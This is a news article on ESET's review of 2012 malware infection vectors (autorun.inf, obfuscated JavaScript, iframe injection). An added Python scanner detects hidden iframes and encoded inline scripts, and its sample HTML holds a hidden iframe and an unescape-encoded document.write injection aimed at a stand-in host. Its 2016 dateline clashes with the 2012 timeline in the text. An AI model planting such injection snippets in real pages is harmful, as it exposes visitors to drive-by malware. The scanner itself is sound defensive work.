February 12, 2016

Top malware threats of last year included autorun and malicious JavaScript

(LiveHacking.Com) – ESET has released a new report looking back at the top attack vectors used by malware to infect PCs in 2012. The top three vectors were the autorun.inf file, obfuscated JavaScript and iframe injections. Together these three accounted for almost 15% of the ways that malware found its way onto PCs.

Autorun.inf is a special file placed on removable media (like USB flash disks) that tells Windows what file to run when the media is inserted into the computer. Many different types of malware copy themselves onto any removable media present and change the autorun.inf file to make sure that the malware is run when the media is inserted into a machine. It is a popular way for malware to infect computers that are not connected to the Internet. A recent report by the USA’s Industrial Control Systems Cyber Emergency Response Team (ICS-CERT) revealed that two power generation facilities became infected with malware via USB flash drives that were being used inside the plants. It is also the method believed to have been used to infect Iran’s nuclear program with Stuxnet. In total, 5% of malware infections detected by ESET’s Live Grid were spread via the autorun.inf file.

Although Microsoft disabled Autorun on Windows XP and Vista nearly two years ago (back in February 2011) to prevent exactly these infections, ZDNet’s Dancho Danchev hypothesizes that the number of infections via Autorun is still high because of software piracy. Basically, users are running a pirated or outdated version of Windows. These installations aren’t being updated because of Microsoft’s Genuine Advantage program and so remain with Autorun enabled. The piracy problem was also reiterated by Symantec when it speculated that “the lack of patching due to piracy may be a contributory factor to high infection rates in those countries.”

Another 8% of infections came via hacked web pages with some kind of malicious intent. When a web page is hacked the attacker can alter the HTML to insert JavaScript or an iframe that redirects the browser to a URL where malware is hosted or that starts a drive-by download. Normally any injected JavaScript is obfuscated.
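To make the injection pattern above concrete from the defender's side, here is an added example (not ESET's detection logic for HTML/Iframe.B or HTML/Scrinject.B, and not code from the article) that scans a page for the two shapes the paragraph describes: an iframe hidden from the user (zero-size or styled invisible) and an inline script that combines a dynamic-code call such as `eval`, `unescape` or `document.write` with a long run of `%xx`, `\x..` or `\u....` escapes. The sample HTML is constructed, including its `injected.example` hostname.

```python
"""Flag hidden iframes and obfuscated inline scripts in an HTML document.

Added example, not from the article or ESET. SAMPLE_HTML is constructed; the
heuristics are generic triage signals, not any vendor's signature.
"""
from html.parser import HTMLParser
import re

HIDDEN_STYLE = re.compile(r"(display\s*:\s*none|visibility\s*:\s*hidden)", re.IGNORECASE)
DYNAMIC_CALL = re.compile(
    r"\b(eval|unescape|String\.fromCharCode|document\.write)\s*\(", re.IGNORECASE
)
# Eight or more consecutive %xx, \xNN or \uNNNN escapes: a hand-written script
# almost never contains such a run, an encoded dropper almost always does.
ESCAPE_RUN = re.compile(r"(?:%[0-9a-f]{2}|\\x[0-9a-f]{2}|\\u[0-9a-f]{4}){8,}", re.IGNORECASE)

# Constructed sample: a normal page with two injected elements appended after the comment.
SAMPLE_HTML = """<html><body>
<h1>Welcome</h1>
<script src="/static/app.js"></script>
<iframe src="https://example.com/widget" width="300" height="200"></iframe>
<!-- constructed injected content follows -->
<iframe src="http://injected.example/in.php" width="0" height="0" style="visibility:hidden"></iframe>
<script>document.write(unescape('%3C%69%66%72%61%6D%65%20%73%72%63%3D%22%68%74%74%70%3A%2F%2F%69%6E%6A%65%63%74%65%64%2E%65%78%61%6D%70%6C%65%2F%22%3E'));</script>
</body></html>
"""


def _tiny(value):
    """True when a width/height attribute is 0 or 1 pixel, i.e. the frame is invisible."""
    try:
        return int(value.strip().rstrip("px")) <= 1
    except (AttributeError, ValueError):
        return False


class InjectionScanner(HTMLParser):
    """Collects (kind, detail, reasons) tuples for suspicious iframes and scripts."""

    def __init__(self):
        super().__init__()
        self.findings = []
        self._in_script = False
        self._script_buf = []

    def handle_starttag(self, tag, attrs):
        a = {k.lower(): (v or "") for k, v in attrs}
        if tag == "iframe":
            reasons = []
            if _tiny(a.get("width")) or _tiny(a.get("height")):
                reasons.append("zero-size iframe")
            if HIDDEN_STYLE.search(a.get("style", "")):
                reasons.append("hidden iframe")
            if reasons:
                self.findings.append(("iframe", a.get("src", ""), reasons))
        elif tag == "script":
            self._in_script = True
            self._script_buf = []

    def handle_data(self, data):
        # Script bodies arrive here (possibly in several chunks) while inside <script>.
        if self._in_script:
            self._script_buf.append(data)

    def handle_endtag(self, tag):
        if tag == "script" and self._in_script:
            self._in_script = False
            body = "".join(self._script_buf)
            reasons = []
            if DYNAMIC_CALL.search(body):
                reasons.append("dynamic-code call")
            if ESCAPE_RUN.search(body):
                reasons.append("long escape run")
            # Either signal alone is common in legitimate code; both together is
            # the classic encoded-dropper shape, so only that pair is reported.
            if len(reasons) == 2:
                self.findings.append(("script", body[:40], reasons))


def scan_html(html):
    """Parse the document and return the list of findings."""
    p = InjectionScanner()
    p.feed(html)
    p.close()
    return p.findings


if __name__ == "__main__":
    for kind, detail, reasons in scan_html(SAMPLE_HTML):
        print(kind, detail, reasons)
```

Run against a site's own pages on a schedule, a scanner like this turns "has our page been altered?" into a diff of findings between crawls; the legitimate widget iframe and the external `app.js` script in the sample produce no finding, while the two injected elements each do.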

“Since poisoned web sites and scripts are an ongoing and regrettable but inevitable part of the threatscape, it’s not surprising that HTML/Iframe.B and HTML/Scrinject.B are still with us…” wrote David Harley, a senior research fellow at ESET.